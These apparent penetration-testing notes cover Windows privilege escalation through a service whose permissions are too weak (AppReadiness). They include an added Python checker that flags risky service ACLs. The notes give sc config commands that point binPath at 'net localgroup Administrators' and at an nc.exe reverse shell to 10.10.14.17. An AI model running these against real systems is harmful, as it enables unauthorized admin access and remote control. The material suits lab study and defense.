Exploit#

Choose a service that runs as SYSTEM, such as AppReadiness. We can query the service configuration like this:

sc qc AppReadiness

Remember to note down the BINARY_PATH_NAME: we will modify it, so when cleaning up we need to restore the original value.

Check permission#

Download PsService and transfer it to the target machine. This binary is part of the Sysinternals suite.

wget https://download.sysinternals.com/files/PSTools.zip
unzip PSTools.zip

Then we can check our permissions over this service. All is good.

.\PsService.exe security AppReadiness
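What the PsService output (or `sc sdshow AppReadiness`) is really telling us is which principals hold SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER on the service, because those are the rights that make the binPath rewrite below possible. The following is an added example, not code from the original notes or from Sysinternals: it parses a service SDDL string of the kind `sc sdshow` prints and flags allow-ACEs that grant such rights to low-privilege principals. The SDDL sample is constructed, not taken from a real host, and the right/SID abbreviations are the documented SDDL ones.

```python
import re

# Two-letter SDDL access-right codes as printed by sc sdshow, mapped to service rights
RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE", "GR": "GENERIC_READ", "GX": "GENERIC_EXECUTE",
}
# Rights that let a principal change what the service runs, or who controls it
DANGEROUS = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL", "GENERIC_WRITE"}
# Well-known SID aliases that should never be able to reconfigure a SYSTEM service
LOW_PRIV = {"AU": "Authenticated Users", "BU": "Users", "IU": "Interactive Users",
            "WD": "Everyone", "AN": "Anonymous"}


def parse_sddl_dacl(sddl):
    """Return (ace_type, sid, rights_set) for each ACE in the DACL part of an SDDL string."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else sddl
    dacl = dacl.split("S:", 1)[0]  # drop the SACL (audit ACEs), if present
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl):
        fields = body.split(";")
        if len(fields) != 6:
            continue  # not a standard ace_type;flags;rights;object;inherit;sid tuple
        ace_type, _flags, rights, _obj, _inh, sid = fields
        if rights.startswith("0x"):
            rights_set = {rights}  # raw mask, left as-is rather than decoded here
        else:
            rights_set = {RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                          for i in range(0, len(rights), 2)}
        aces.append((ace_type, sid, rights_set))
    return aces


def find_weak_aces(sddl):
    """List (principal, dangerous_rights) for allow-ACEs granting control to low-privilege SIDs."""
    findings = []
    for ace_type, sid, rights in parse_sddl_dacl(sddl):
        if ace_type != "A" or sid not in LOW_PRIV:
            continue
        hits = sorted(rights & DANGEROUS)
        if hits:
            findings.append((LOW_PRIV[sid], hits))
    return findings


# Constructed sample: Authenticated Users wrongly hold DC (SERVICE_CHANGE_CONFIG)
SAMPLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCDCLCSWRPWPLOCRRC;;;AU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

if __name__ == "__main__":
    for principal, hits in find_weak_aces(SAMPLE_SDDL):
        print(f"{principal}: {', '.join(hits)}")
```

A clean service DACL yields no findings; anything listed is a principal that can repoint the service the way the rest of these notes describe.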

Modify service#

Here we add the user server_adm to the local Administrators group:

sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

Or we can run a reverse shell, or whatever else you want to execute:

sc.exe config AppReadiness binPath= "C:\programdata\nc.exe -e cmd.exe 10.10.14.17 9090"

Restart the service so the new binPath is executed:

sc.exe stop AppReadiness
sc.exe start AppReadiness

Clean up#

sc config AppReadiness binPath= "<original BINARY_PATH_NAME>"
sc.exe stop AppReadiness
sc.exe start AppReadiness